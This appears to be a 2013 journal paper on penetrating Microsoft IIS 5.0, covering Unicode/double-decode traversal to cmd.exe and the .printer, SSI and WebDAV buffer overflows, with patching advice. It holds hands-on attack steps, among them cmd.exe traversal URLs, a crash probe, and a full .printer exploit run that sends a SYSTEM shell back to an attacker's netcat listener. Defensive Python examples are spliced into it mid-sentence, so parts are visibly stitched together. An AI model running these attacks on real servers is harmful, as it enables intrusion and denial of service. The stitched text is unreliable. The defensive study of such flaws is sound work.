Penetrating Internet Information Services (IIS).
1Odabi I. Odabi and 2Linda Osazuwa
1 Department of Mathematics and Computer Science, Benson Idahosa University, Benin City.
2 Department of Computer Science, Delta State Polytechnic, Ogwashi-Uku.
Telephone: 08033380178. Email: [email protected]
Abstract
The intent of this paper is to present a number of commonly exploited IIS vulnerabilities. The prominent attacks are explained so that the reader becomes familiar with the concept of vulnerabilities and the techniques used to exploit them, and so that Information Technology professionals can apply this understanding to future security issues as they arise. Some of the common vulnerabilities found in the Internet Information Services (IIS) packages are presented. Note that while some of these vulnerabilities could be present on IIS 6.0 (particularly in the IIS 5.0 compatibility mode), none of them will work against a default installation of Windows Server 2003. This is due to the extensive changes to the default installation profile of IIS 6.0, which disables all dynamic content and includes no sample applications. As we proceed through the vulnerabilities, we will mention the status of each on IIS 6.0.
Key words: IIS, HTTP, Exploit, Command and Buffer Hacking, PERL, Unicode.
_______________________________________________________________________
Introduction
While Internet Information Services encompasses a variety of services including FTP, SMTP, and NNTP, the most common IIS server is the World Wide Web Publishing Service. This is where most of the IIS vulnerabilities are found and will be the focus of our discussion. Before we begin discussing the vulnerabilities in this service, it is important to understand the basic operation of HTTP.
Considering the wide scope of security in information delivery, this paper is centered on and limited to the security of Internet Information Services. Internet fraud has become a common problem across the globe. Definitely there is no absolute security in the world of Information Technology. This paper examines the techniques to reduce the impact of fraudulent internet users.
West African Journal of Industrial and Academic Research, Vol.99 No.1, December 2013
Simple HTTP Requests
At its most basic, an HTTP connection is comprised of a client request and a server response in a single session. An HTTP request specifies the action and the resource requested, as well as any specific connection parameters or capability definitions provided by the browser. The response will vary depending on the action and the resource, but in the majority of cases will take the form of HTML data. A very simple HTTP exchange may look like the following:
GET / HTTP/1.0
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sat, 10 May 2003 05:12:53 GMT
Connection: Keep-Alive
Content-Length: 1270
Content-Type: text/html
Set-Cookie: ASPSESSIONIDGQQGQJFC=ADAPBPDCAKPLECKGHCNHNJIK; Path=/
Cache-control: private
<HTML><BODY>
<P>Some html data…<BR>
</BODY></HTML>
The first line is supplied by the browser, specifying the action (GET), the resource (/), and the HTTP protocol and revision (HTTP/1.0). The browser follows this GET request with two carriage returns, which signals the HTTP server that the browser has completed its request. The first line returned by the server is the HTTP response code, followed by the HTTP headers, and finally the HTML data. Unless certain keep-alive options are set, the server terminates the connection after it has responded to the request.
The example above did not specify any request parameters, so our request was limited to a single line. Most browsers will provide significantly more information to the server to indicate the types of content the browser can accept, or in the case of forms, the data it is supplying. These options follow the initial action and are followed by two carriage returns. In many IIS vulnerabilities, the exploit is delivered through these facilities. The following shows an abbreviated POST request:
POST /form.html HTTP/1.1
Accept: image/gif, image/x-bitmap, image/jpeg, image/pjpeg
Content-type: application/x-www-form-urlencoded
Content-length: 14

username=modea
Some basic exploits can be executed entirely within the request URL and can be launched from a standard browser like Internet Explorer. Many exploits require that the attacker have more precise control over their request, tuning the parameters normally supplied by the browser. In these cases, the attacker needs more precision than most browsers can provide.
Speaking HTTP
Because HTTP is a simple TCP protocol, it is possible to use a standard telnet application to communicate with an HTTP server simply by specifying the HTTP port in the command line:
E:\hacknotes>telnet naïve.hacknotes.com 80
If you are a very good typist, the Windows telnet application can provide all the facilities needed for many HTTP hacks, but due to the lack of local echo (seeing the characters that you are typing) using telnet can be trying. For these types of probes, hackers and security professionals alike usually turn to the netcat tool, nc. Originally released by Hobbit on UNIX platforms, and later ported to Win32 by Chris Wysopal, netcat provides a simple network connection tool that is very well suited for basic HTTP (http://www.atstake.com/research/tools/network_utilities/). A request file for netcat contains the request followed by two carriage returns:
GET / HTTP/1.0
[cr]
[cr]
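As an added example (not code from the paper), the following Python script builds a raw HTTP/1.0 request the way the netcat input file above does, can send it over a plain TCP socket, and parses the status line and headers of the reply. The response bytes embedded in it are a constructed sample modelled on the IIS 5.0 exchange shown earlier; the host name passed to probe() is an assumed placeholder, and the script itself runs offline against the sample.

```python
import socket

# Added example, not from the paper: raw HTTP request framing and response
# parsing, the same work a netcat input file and a careful reader of the
# reply do by hand. SAMPLE_RESPONSE is a constructed sample.

CRLF = b"\r\n"


def build_request(method: str, path: str, headers=None, body: bytes = b"") -> bytes:
    """Request line, optional headers, then the blank line (the 'two carriage
    returns' the text describes) and an optional body."""
    lines = [f"{method} {path} HTTP/1.0".encode()]
    for name, value in (headers or {}).items():
        lines.append(f"{name}: {value}".encode())
    if body:
        lines.append(f"Content-Length: {len(body)}".encode())
    return CRLF.join(lines) + CRLF + CRLF + body


def parse_response(raw: bytes):
    """Split a raw response into (status code, header dict, body bytes)."""
    head, _, body = raw.partition(CRLF + CRLF)
    status_line, *header_lines = head.split(CRLF)
    parts = status_line.split(b" ", 2)          # b"HTTP/1.1", b"200", b"OK"
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(b":")   # split at the first colon only
        headers[name.strip().decode().lower()] = value.strip().decode()
    return int(parts[1]), headers, body


def probe(host: str, port: int, request: bytes):
    """Send one request and read until the server closes the connection,
    which is what an HTTP/1.0 server without keep-alive does."""
    with socket.create_connection((host, port), timeout=10) as s:
        s.sendall(request)
        chunks = []
        while True:
            chunk = s.recv(4096)
            if not chunk:
                break
            chunks.append(chunk)
    return parse_response(b"".join(chunks))


# Constructed sample modelled on the paper's IIS 5.0 exchange.
SAMPLE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Server: Microsoft-IIS/5.0\r\n"
    b"Date: Sat, 10 May 2003 05:12:53 GMT\r\n"
    b"Connection: Keep-Alive\r\n"
    b"Content-Length: 50\r\n"
    b"Content-Type: text/html\r\n"
    b"Set-Cookie: ASPSESSIONIDGQQGQJFC=ADAPBPDCAKPLECKGHCNHNJIK; Path=/\r\n"
    b"Cache-control: private\r\n"
    b"\r\n"
    b"<HTML><BODY><P>Some html data...<BR></BODY></HTML>"
)

if __name__ == "__main__":
    print(build_request("GET", "/"))
    code, hdrs, body = parse_response(SAMPLE_RESPONSE)
    print(code, hdrs["server"], len(body), "bytes of body")
    # probe("naive.hacknotes.com", 80, build_request("GET", "/"))  # assumed host
```

The Server header and the ASPSESSIONID cookie are what a tester reads first from such a reply: they identify the platform and version before any further request is sent.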
Now, we will feed this file into a netcat connection to our target HTTP server:
E:\hacknotes>type getreq | nc naïve.hacknotes.com 80
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Connection: Keep-Alive
[...]
It is important to provide sample HTTP requests that can be used to test your own servers. To prevent simple typing errors from affecting your tests, using netcat in this fashion is recommended.
Delivering Advanced Exploits
When we begin to work with buffer overflow vulnerabilities in IIS processes, our exploits will need to precisely deliver raw binary data, known as shellcode, as part of our HTTP request. Some of these exploits can be delivered using the netcat method described above, but in most cases the exploit developers provide a Perl or C program that allows simple execution from a command-line interface.
When you begin searching the Internet for exploit code, you must be very careful with what you find. You should never compile or run anything that you don’t understand, especially when it comes from an untrusted source. Code billed as an exploit could actually be a virus or Trojan application, even if it is delivered in source form. Proceed at your own risk, and exercise caution. If you do obtain working exploits, use them responsibly. Forensics consultants love novice hackers; they leave lots of tracks.
Working with PERL Exploits
Perl (Practical Extraction and Reporting Language) is a multipurpose scripting language available on a very wide range of platforms. Perl has library support for raw TCP/IP socket operations, so an exploit developed in Perl can be just as easily used on Windows as it is on Linux or Solaris. Perl exploits are usually more reliable than their C counterparts as platform dependencies are not involved. When possible in this paper, we will demonstrate Perl exploits instead of the C equivalents. For Windows systems, the most common Perl implementation is ActivePerl, available from http://www.activestate.com. There are other binary distributions available as well; a complete list of ports (for Windows and other operating systems) can be found at the Comprehensive Perl Archive Network’s homepage at http://www.cpan.org.
Working with C Exploits
In some cases, simple exploits that have been developed for the Linux platform can be compiled under the Cygwin environment on Windows systems. Cygwin, available from http://www.cygwin.com, provides an emulation layer for applications by translating Linux system calls to Windows facilities. Executables generated with Cygwin can be used elsewhere provided that the cygwin1.dll library is available. In the Cygwin environment, exploits can be compiled like so:
cygwin$ gcc -o exploit.exe exploit.c
Other exploits may be developed to use native Windows socket libraries and usually require a commercial C compiler such as Microsoft Visual C++ or Borland C++ to build. If you have access to one of these tools, you can usually compile these exploits by creating a simple command-line executable project and simply pasting in the exploit code as the only source file in the project. If you are not fortunate enough to have a full development environment, you will need to enlist the services of a colleague to build the exploits you find. As mentioned in the preceding note, you really should not attempt building any C exploits without at least a cursory knowledge of the language; otherwise, you may unwittingly play the role of a Patient X.
Often compilation on either platform requires basic debugging skills such as identifying problems with line breaks or invalid characters introduced during HTML or other transfers. Less frequently, the exploit source will be delivered with a couple of deliberate bugs that prevent successful compilation; these errors are easily corrected by experienced programmers but serve to prevent novices from obtaining a working exploit. Such an exploit may successfully crash the target server but will not return the expected shell [7].
The Big Nasties: Command Execution
These issues, though easily patched, provide attackers quick and easy access to the remote system either by fooling IIS into allowing arbitrary file system navigation or by exploiting unchecked buffer flaws in some of the default ISAPI applications. Many of these issues can result in immediate Local System-level compromise, so an attacker need not worry about privilege escalation before he begins harvesting the system’s resources [9].
Unicode/Double Decode URL Parsing Attack
One of the most simplistic yet devastating IIS hacks, the Unicode/double decode URL parsing vulnerability, is caused by poor URL handling within IIS. When a request is received, IIS checks to ensure that the URL specified is acceptable before passing it on for processing. If IIS detects an obvious violation, it rejects the request. So if you point your browser to http://target_host/scripts/../../../../winnt/system32/cmd.exe?/c+dir, you receive a 404 error. IIS detects the presence of directory traversal (/../..) and summarily rejects the request.
However, if you replace parts of the URL with Unicode-encoded strings, IIS fails to detect the traversal attempt. The reason for this behavior is that IIS processes the URL encoding after it verifies the validity of the URL. So to bypass the checking, we can simply replace parts of the URL with Unicode-encoded characters, like so:
http://naïve/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+d:\
Creating a netcat input file with this resource, we can create a simple command to test servers for Unicode exposure:
E:\hacknotes>type uniget.txt | nc 192.168.100.15 80
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sat, 10 May 2003 18:54:31 GMT
Content-Type: application/octet-stream
 Volume Serial Number is 6532-EE86
 Directory of d:\
12/07/1999 05:00a 45 AUTORUN.INF
12/07/1999 05:00a <DIR> BOOTDISK
12/07/1999 05:00a 5 CDROM_IS.5
12/07/1999 05:00a 5 CDROM_NT.5
12/07/1999 05:00a <DIR> CLIENTS
12/07/1999 05:00a <DIR> I386
12/07/1999 05:00a <DIR> PRINTERS
12/07/1999 05:00a 16,490 READ1ST.TXT
12/07/1999 05:00a 233,472 README.DOC
12/07/1999 05:00a 151,824 SETUP.EXE
Obviously Unicode filesystem traversal and command execution was a serious vulnerability, allowing advanced hacking to be conducted by a novice with no more elaborate tools than a copy of Internet Explorer. Microsoft responded quickly with a patch for the issue in security bulletin MS00-086. The patch was also rolled up with the release of Windows 2000 Service Pack 2.
Unfortunately, a short time later a very similar parsing flaw was discovered, affecting even servers running SP2. While the MS00-086 patch had updated IIS to decode the Unicode entries in the URL before passing the request, researchers at NSFocus determined that because IIS performed only one Unicode translation before validation, they could simply provide “double encoding” by specifying the hexadecimal equivalent of the % sign, %25. After this first encoding is processed, the remaining URL can be even more simplistic than those used to exploit the Unicode vulnerability. This technique for bypassing the Unicode protection in MS00-086 is referred to as “double-decode” or “superfluous decode”. Expressed in this form, our preceding URL would look like this:
http://naive/scripts/..%255c../winnt/system32/cmd.exe?/c+dir
Double-decode can work equally well regardless of whether or not the target has installed SP2 or MS00-086. When the host does have one of these patches, it performs a single pass of decoding on the URL, so when the URL is processed, it looks like this:
http://naive/scripts/..%5c../winnt/system32/cmd.exe?/c+dir
The %5c is simple hexadecimal encoding of the / character, so the request is equivalent to our Unicode attacks above. The double-decode vulnerability was addressed as a post-SP2 patch in security bulletin MS01-026 and included in Windows 2000 SP3.
Let us take a quick moment to look at the URLs we have provided in these requests. We will dissect our Unicode request, http://naive/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+d:\. First, notice that the request begins with a legitimate IIS default
directory, scripts. In a default IIS 5.0 install, this virtual directory allows execution of both scripts and executable programs, whereas the root directory permits only script execution. Other default virtual directories have similar permissions, so if at first you do not succeed, try and try again. Even though the actual program we are running is well out of the web directory, the fact that the directory traversal begins in the scripts virtual directory allows us to run command-line applications. If you try executing the previous netcat test without the scripts directory, the request will fail [1].
Following the scripts directory, we have our encoded directory traversal. There are actually a variety of encodings to accomplish this, some Unicode and some double-encoded. After we’ve completed our directory traversal (to the drive root, in this case), we simply walk back up the directory tree to an executable whose location we have guessed based on common defaults. Our final resource for this URL is cmd.exe, and we provide command-line options using standard URL parameter passing. If we can guess where the application is, we can run it! However, this means that if the web root is not on the same file system as the system directory, we are more limited in finding applications.
Preventing Unicode/Double-Decode Attacks
Windows 2000 SP2 (and the SP1 hotfix MS00-086) introduced a fix to the original Unicode problem, and the subsequent double-decode vulnerability was addressed in SP3 or the SP2 hotfix MS01-026. The patches provide better defense against encoded URLs, but they do not impose any additional restrictions on the Internet user accounts, so administrators are encouraged to review their file system permissions to decide if the current file system permissions afforded to the Internet guest accounts are acceptable. Windows Server 2003 does not suffer from either of these vulnerabilities.
The lessons learned from Unicode and double-decode go well beyond maintaining patch levels. For the vast majority of sites, there is no reason that the Internet guest accounts require execute access to system executables such as cmd.exe. The variety of attacks that were enabled by allowing even unprivileged arbitrary command execution opened the eyes of many security administrators and Microsoft product managers alike. The overwhelming success of the Unicode and double-decode exploits was a significant motivator in the design and default configuration of IIS 6.0. Were such a vulnerability to be discovered in Windows Server 2003, the attacker would find the file system much less accommodating to Internet guest accounts.
Printer Buffer Overflow
In mid-2001, a vulnerability was discovered by researchers at eEye Digital Security (http://www.eeye.com) in the Internet Printing Protocol implementation installed by default on IIS v5.0. The protocol is handled in IIS by an ISAPI extension that maps the resource extension .printer to the msw3prt.dll application. The team at eEye discovered an unchecked buffer in this DLL’s request handling of the Host header field. Beyond a certain amount of data, any information contained in the Host header would simply overrun system memory. If the data introduced into memory were junk, IIS would
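To make the ordering flaw behind the Unicode and double-decode attacks concrete, here is an added Python example (not IIS code and not from the paper). It puts the flawed sequence, validate the raw URL first and decode afterwards, beside a canonicalising check that decodes to a fixed point and refuses overlong UTF-8 before validating. The paths it runs are constructed from the URLs discussed above; the three-pass decoding limit is an assumption chosen for the example.

```python
import re

# Added example, not IIS code: the check order the paper describes
# (validate the raw URL, decode afterwards) beside a canonicalising check
# that decodes to a fixed point before validating. Sample paths are
# constructed from the paper's URLs.

PCT = re.compile(rb"%([0-9A-Fa-f]{2})")


def decode_once(path: bytes) -> bytes:
    """One pass of %XX decoding: the single translation IIS 5.0 performed."""
    return PCT.sub(lambda m: bytes([int(m.group(1), 16)]), path)


def has_traversal(path: bytes) -> bool:
    """True if any segment is '..'; both / and \\ count as separators."""
    return any(seg == b".." for seg in re.split(rb"[/\\]", path))


def has_overlong_utf8(path: bytes) -> bool:
    """Flag overlong UTF-8 such as C0 AF (a 2-byte spelling of '/')."""
    for i, b in enumerate(path):
        if b in (0xC0, 0xC1):                # 2-byte form of a 7-bit code point
            return True
        if b == 0xE0 and i + 1 < len(path) and path[i + 1] < 0xA0:
            return True                      # 3-byte form of a 2-byte code point
    return False


def iis5_style_check(path: bytes) -> str:
    """Flawed order: validate first, decode later, so encoded '..' slips past."""
    if has_traversal(path):
        return "rejected"
    decode_once(path)  # happens after validation; too late to matter
    return "allowed"


def canonical_check(path: bytes, max_passes: int = 3) -> str:
    """Decode until nothing changes, refuse overlong UTF-8, then validate."""
    current = path
    for _ in range(max_passes):
        if has_overlong_utf8(current):
            return "rejected"
        decoded = decode_once(current)
        if decoded == current:
            break
        current = decoded
    else:
        return "rejected"  # still changing after max_passes: refuse, don't guess
    if has_overlong_utf8(current) or has_traversal(current):
        return "rejected"
    return "allowed"


# Constructed samples: plain traversal, the paper's Unicode and
# double-decode forms, and a benign request.
SAMPLES = [
    b"/scripts/../../winnt/system32/cmd.exe",
    b"/scripts/..%c0%af../winnt/system32/cmd.exe",
    b"/scripts/..%255c../winnt/system32/cmd.exe",
    b"/default.asp",
]


def compare(paths=SAMPLES):
    """Map each path to (flawed verdict, canonical verdict)."""
    return {p: (iis5_style_check(p), canonical_check(p)) for p in paths}


if __name__ == "__main__":
    for p, (flawed, fixed) in compare().items():
        print(f"{p.decode('latin-1'):48} iis5={flawed:9} canonical={fixed}")
```

The plain traversal is caught by both checks; the %c0%af and %255c forms pass the flawed check and are rejected by the canonical one, which is exactly the gap MS00-086 and MS01-026 closed one pass at a time. Decoding to a fixed point and then validating removes the dependence on how many encoding layers an attacker stacks.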
simply crash and restart automatically. If, however, the data were carefully formulated shellcode, the attacker could introduce executable code in the Host header field, which would be executed in the msw3prt.dll application. Further complicating the issue, msw3prt.dll was defined as an “in-process” application and would execute with the same Local System privileges as the IIS server itself, instead of the more restricted Internet guest accounts.
For a simple test for the presence of the vulnerability, we can formulate a simple GET request for delivery with our netcat method described earlier. The request file for this attack would look like the following:
GET /anything.printer HTTP/1.0
Host: [any character repeated 422 times]
Delivery of this probe does not return anything of significance back to the attacker. On a vulnerable server, however, the Event Log records a number of entries in the System Log, depending on how many services are running under the core IIS process, inetinfo.exe. The Event Log entries will read something like the following:
The World Wide Web Publishing Service terminated unexpectedly. It has done this 2 time(s). The following corrective action will be taken in 0 milliseconds: No action
Well, crashing a service is kind of fun, but IIS 5.0’s immediate restart feature means even the crash is short-lived. No worries. A number of researchers picked up on eEye’s announcement of the .printer vulnerability, and in short order a few different exploits began turning up for the vulnerability. Most of these exploits were based on the jill.c exploit code released by dark spyrit of beavuh labs, and all behave similarly [2].
So how do attackers and security professionals find exploit code? Within the first days of a vulnerability’s release, exploits are usually hard to come by and are being closely guarded by their authors. Often, working exploits exist long before the vulnerability is announced, as researchers who find problems will usually allow the vendor some time to respond to the issue before they go public. After the vulnerability is released, other researchers may begin developing exploits, and it’s not uncommon for a few different exploits to exist for the same issue. Usually, within a week or so of the initial announcement, a functional exploit can be found in security-related newsgroups and web sites. To obtain the exploit we describe for the printer vulnerability, we simply searched Google.com for “IIS .printer exploit code”; the code we use in this paper was the second link returned.
To keep things simple, we will use a Perl version of this exploit developed by Cyrus The Great, ported from both the original proof-of-concept code released by eEye and the shellcode from dark spyrit’s jill.c application (which can be accessed from http://www.securiteam.com). A quick search for “IIS .printer exploit code” or “IISHACK2000 perl” should turn up a few sources for this exploit. When you find the Perl script, simply copy and paste the script into a text file and save it with a .pl extension. For our example, we have named the script prntbo.pl. The comments at the top of the script provide simple instructions:
# shell code spawns a reverse CMD shell, you should setup a
# listener ..
# use nc11nt for Windows platform, nc for unix
# nc -l -v -t -p <attacker port>
So now we get to use netcat for a whole other purpose. Before we launch our attack, we will create a listening port on our host. If the exploit is successful, it will actually call us back on the port we specify and feed us a command prompt (this process is often referred to as “shoveling a shell”). A note before we try this exploit: due to the way the shellcode executes, there is a very good chance that the IIS server will be rendered unusable until it is actually rebooted. This is not something you want to try against a production site, and certainly not something you want to try against any machines that you do not administer [2].
To kick off this exploit, we will need to open two command prompt windows. In the first, we will start a netcat listener as suggested in the comments of the Perl script. We will set up a netcat listener on TCP port 8000, using the following command:
E:\hacknotes>nc -l -v -p 8000
listening on [any] 8000
Now we will switch to our second prompt and use Perl to execute the script, prntbo.pl. The author was even kind enough to include command-line usage assistance:
E:\hacknotes\exploits>perl prntbo.pl
Usage:
prntbo.pl <victim host> <victim port> <listen host> <listen port>
Victim Host: Address of IIS5 server to own
Victim Port: IIS5 service port (80)
Listen host: Attacker host IP address
Listen port: Port number of netcat listener
E:\hacknotes\exploits>perl prntbo.pl 192.168.100.15 80 192.168.100.4 8000
Connecting…
Sending exploit…
Exploit sent .. you may need to send a CR on netcat listening port
Following Cyrus’s instructions once again, we switch back to our netcat listener window. If our exploit was successful, we should see a connect statement in the window now. Sending the carriage return completes the connection, and we receive our command prompt. As our last step, we’ll confirm our user context with the whoami.exe resource kit tool, as we did before with the Unicode attack.
connect to [192.168.100.4] from NAÏVE [192.168.100.15] 1035
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.
E:\WINNT\system32>
E:\WINNT\system32>cd \
cd \
E:\>whoami.exe
whoami.exe
NT AUTHORITY\SYSTEM
E:\>
While we cannot run interactive applications from this command prompt due to the limitations of our netcat session, we have full access to the file system and executables and can set about building ourselves a nice little rootkit. Using command-line file acquisition tools like tftp or ftp, the attacker will download other command-line utilities he can use to make the session more comfortable [10].
There is one catch, though, that is constantly forgotten by novice attackers: if you issue a CTRL-C to cancel an operation (such as a directory listing of
the System32 directory on a slow link), you will actually cancel your netcat session, and your command shell will be lost. Worse, because the shellcode (understandably) has no error control, it will not terminate on its own when you disconnect. If you do not quit the remote shell by explicitly calling exit before you disconnect, the remote server will go into an unrecoverable failure mode and will need to be rebooted. You will not be able to get back in via the .printer exploit until the system has been restarted. The same applies if you run the exploit without a listener to catch the shell. These caveats make this a fairly risky exploit to try: if you blow it, you will take IIS out of the picture entirely (possibly leaving the system a whole lot more secure in the process).
Remove IIS .PRINTER Functionality
The buffer overflow issue in msw3prt.dll was corrected in the patch accompanying Microsoft security bulletin MS01-023, and was included in Windows 2000 SP2. Windows Server 2003 does not even offer the .printer ISAPI mapping by default. On IIS 5.0 however, unless the Internet Printing Protocol function is in use, administrators are strongly encouraged to remove the ISAPI application mapping for .printer resources. The ISAPI mappings can be defined for the entire server or an individual web site from the IIS management console snap-in.
• Start the Internet Information Services Manager by selecting Start | Run… and entering inetmgr.
• Right-click the server name in the left-hand panel and select Properties.
• Select WWW Service and click Edit.
• Click the Home Directory tab.
• Click the Configuration button.
• In the Application Configuration dialog box, remove any ISAPI application mappings that are not specifically required for your web site.
Typically, IIS buffer overflows do not occur in the core IIS program inetinfo.exe but in one of the applications just defined. The default activation of all of these ISAPI applications provides a number of pathways for an attacker. When in doubt, remove all ISAPI mappings and then re-add the ones that are in fact required by your sites. Windows Server 2003 ships with no ISAPI extensions enabled by default, requiring administrators to explicitly enable the ones they need.
Server-Side Include Buffer Overflow Attack
In June of 2001, researchers with the NSFocus Security Team contacted Microsoft about a vulnerability they had uncovered in the code that managed server-side includes (SSI) as an ISAPI application, ssinc.dll. By default, the extensions .shtm, .shtml, and .stm are mapped to the SSI application. When the SSI sees a directive like the following, it opens the file specified and outputs all the content as if it had been included in the original .shtml file:
<!--#include file="afile.html"-->
The NSFocus researchers discovered that when the SSI checked the filename length (to ensure that it would not overflow any buffers), it did not take into account the length of any relative paths, such as the one the .shtml file was
being called from. As a result, there lies an opportunity to overflow the buffer by specifying a filename that occupies the entire buffer and is called from a relative path. The attack for the SSI buffer overflow is a little more challenging because it requires some setup in the web root directory itself. This can frequently be accomplished through other hacks, such as the Unicode/double-decode command execution described earlier, but it does severely limit the usefulness of this vulnerability.
An exploit was released for the Server-Side Include vulnerability by Indigo in December of 2001, a small program called jim.c (in reference to dark spyrit’s jill.c exploit for the .printer buffer overflow, discussed earlier). The jim.c tool is used to create an .shtml file that, if accessed from a web client, spawns a shell back to the attacker in the same fashion as we did with the .printer vulnerability. jim.c can easily be found by searching for “IIS SSI exploit” or from the Securiteam web site exploit archive at http://www.securiteam.com/exploits/archive. The source included on this site does have one or two small errors that will affect its compilation; you may have better luck compiling this one in a Cygwin environment as we have done. Once built, the tool is executed by simply providing the IP address and port that you’d like the target host to connect back to [6].
administrator@mandark ~
$ ./ssi.exe 192.168.100.4 800
jim - IIS Server Side Include overflow launcher by <Indigo@talk21.com> 2001
To exploit this vulnerability you must have write access to the web root of the target web server.
This program will generate a file called ssi.shtml.
Create a directory in the web root whose name is 12 characters long eg. ssi_overflow then put the file into the new directory. Start up a netcat listener:
nc -l -p <attacker port> -vv
access the file http://target/ssi_overflow/ssi.shtml using a web browser. A SYSTEM shell will appear.
administrator@mandark ~
$ ls
ssi.exe ssi.shtml ssi_exploit.c
Following the instructions, we transfer this file to our target host and set it up in the /ssi_overflow directory. This may be done using legitimate permissions (such as on an intranet workgroup web server), or through another hack such as the Unicode command execution. In some cases, an inexperienced administrator may have even allowed Write access to the root directory, and you can simply PUT the file to the web server. After the file is loaded, we go ahead and fire up our netcat listener again, and then browse to http://target/ssi_overflow/ssi.shtml. If the system is not properly patched and we have a bit of luck on our side, our netcat listener will pick up a shell being shoveled back to us. If we’re not so fortunate, we’ll have dumped a file on the remote host and thrown a few Event Log entries to boot from crashing IIS via the ssinc.dll application [8].
Disable Server-Side Includes
The server-side include vulnerability was addressed in a rollup patch in Microsoft security bulletin MS01-044, and is included in Windows 2000 SP3. This patch addresses the buffer overflow within the ssinc.dll ISAPI application that is called by the .shtml file created by jim.c. Like all ISAPI filters, if server-side includes are not specifically
required by the web sites operating on the server, the mappings for .shtml, .shtm, and .stm should be deleted from all sites. Refer to the .printer overflow described earlier for instructions on removing ISAPI application mappings in “Remove IIS .printer Functionality.”
WebDAV ntdll.dll Buffer Overflow Attack
WebDAV is an HTTP extension introduced in HTTP v1.1 that defines special actions for use in authoring and managing web content. WebDAV stands for Web-based Distributed Authoring and Versioning, and is supported in IIS v5.0 by default. In March 2003, Microsoft issued security bulletin MS03-007 describing an unchecked buffer in the WebDAV handling routines, a vulnerability that could be exploited through a default installation of IIS. The actual vulnerability lies in a core operating system library, ntdll.dll.
When IIS receives a WebDAV request, it does not perform any length checking on the request resource. So it is possible to supply a filename in excess of 65,535 bytes in length and it will be happily passed to lower-level operating system functions, where a properly formatted filename can overrun memory and result in privileged code execution. While the WebDAV attack is the first method of exploiting this issue in ntdll.dll, Litchfield provides a long list of other functions that call the same flawed function that triggers the WebDAV buffer overflow (http://www.nextgenss.com/papers/ms03-007-ntdll.pdf).
Public WebDAV exploits exist in both C-source and Perl forms and operate in the standard “shell back to attacker” fashion. The public exploits are finicky, however, and frequently fail to trigger the exploit properly, returning instead nothing more than an invalid request error. However, some recent attacks have been attributed to this WebDAV buffer overflow, so it is possible that there are more robust exploits available in limited circulation.
Update ntdll.dll, Disable WebDAV
The WebDAV buffer overflow is corrected in the post-SP3 hotfix available in Microsoft security bulletin MS03-007. While WebDAV is not available in IIS 4.0, there is a patch available for Windows NT v4.0 as this vulnerability actually exists in a core system library and could potentially be exploited by other methods than WebDAV.
Even if the patch is applied, if WebDAV is not required on an IIS server, best practice suggests that the WebDAV methods exposed be disabled. The IIS Lockdown tool can install URLScan and configure it to block all WebDAV method requests. If WebDAV services are required and the patch cannot be applied, Microsoft provides additional solutions in MS03-007 regarding specific tools that can be installed to mitigate the risk from this vulnerability [3].
Remove IDQ/IDA Mappings
The Index Server vulnerabilities exploited by Code Red (and a host of other tools) were corrected in the patch associated with Microsoft security bulletin MS01-033 (later rolled up into MS01-044), and are included in Service Pack 3. The patch corrects the unchecked buffer condition in the IDQ.DLL application but does not disable the associated ISAPI mappings. The MS01-044 roll-up patch included a number of other patches, affecting some
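The mitigations recommended for .printer, server-side includes, WebDAV and IDQ/IDA all reduce to the same idea: refuse requests that reach an ISAPI mapping the site does not need, or that carry fields far larger than any legitimate client sends. The following Python request filter is an added example in the spirit of URLScan; it is neither Microsoft's code nor the paper's. The blocked-extension list, the 4096-byte URI and 256-byte header limits, and the sample requests are assumptions constructed for the example.

```python
import os

# Added example, not Microsoft's or URLScan's code: a request filter that
# applies the controls recommended for .printer, SSI, WebDAV and IDQ/IDA:
# refuse unused ISAPI-mapped extensions, cap Host header and request-URI
# lengths, and block WebDAV methods. Limits and sample requests are
# assumptions chosen for this example.

BLOCKED_EXTENSIONS = {".printer", ".shtml", ".shtm", ".stm", ".ida", ".idq"}
WEBDAV_METHODS = {"PROPFIND", "PROPPATCH", "MKCOL", "COPY", "MOVE",
                  "LOCK", "UNLOCK", "SEARCH"}
MAX_URI_LEN = 4096     # assumed; far below the 65,535+ bytes the ntdll.dll flaw needed
MAX_HEADER_LEN = 256   # assumed; the .printer probe used a 422-byte Host header


def parse_request(raw: bytes):
    """Split the request head into (method, target, headers); the body is ignored."""
    head = raw.split(b"\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split(b"\r\n")
    parts = request_line.decode("latin-1").split(" ")
    method, target = parts[0], parts[1] if len(parts) > 1 else ""
    headers = {}
    for line in header_lines:
        name, _, value = line.decode("latin-1").partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers


def inspect_request(raw: bytes) -> list:
    """Return the policy violations found; an empty list means the request passes."""
    method, target, headers = parse_request(raw)
    findings = []
    if method.upper() in WEBDAV_METHODS:
        findings.append(f"webdav method {method}")
    if len(target) > MAX_URI_LEN:
        findings.append(f"request-uri too long ({len(target)} bytes)")
    path = target.split("?", 1)[0]                      # extension comes from the path only
    ext = os.path.splitext(path.rsplit("/", 1)[-1])[1].lower()
    if ext in BLOCKED_EXTENSIONS:
        findings.append(f"blocked extension {ext}")
    for name, value in headers.items():
        if len(value) > MAX_HEADER_LEN:
            findings.append(f"header {name} too long ({len(value)} bytes)")
    return findings


# Constructed sample requests: the shape of the paper's .printer probe, an
# SSI page, an oversized WebDAV request and an ordinary page fetch.
SAMPLE_REQUESTS = {
    "printer_probe": b"GET /anything.printer HTTP/1.0\r\nHost: " + b"A" * 422 + b"\r\n\r\n",
    "ssi_page": b"GET /ssi_overflow/ssi.shtml HTTP/1.0\r\nHost: naive\r\n\r\n",
    "webdav_long": b"PROPFIND /" + b"A" * 70000 + b" HTTP/1.1\r\nHost: naive\r\n\r\n",
    "normal": b"GET /default.asp?id=1 HTTP/1.0\r\nHost: naive\r\n\r\n",
}


def triage(requests=SAMPLE_REQUESTS):
    """Run every sample through the filter and return {name: findings}."""
    return {name: inspect_request(raw) for name, raw in requests.items()}


if __name__ == "__main__":
    for name, findings in triage().items():
        verdict = "PASS" if not findings else "BLOCK " + "; ".join(findings)
        print(f"{name:14} {verdict}")
```

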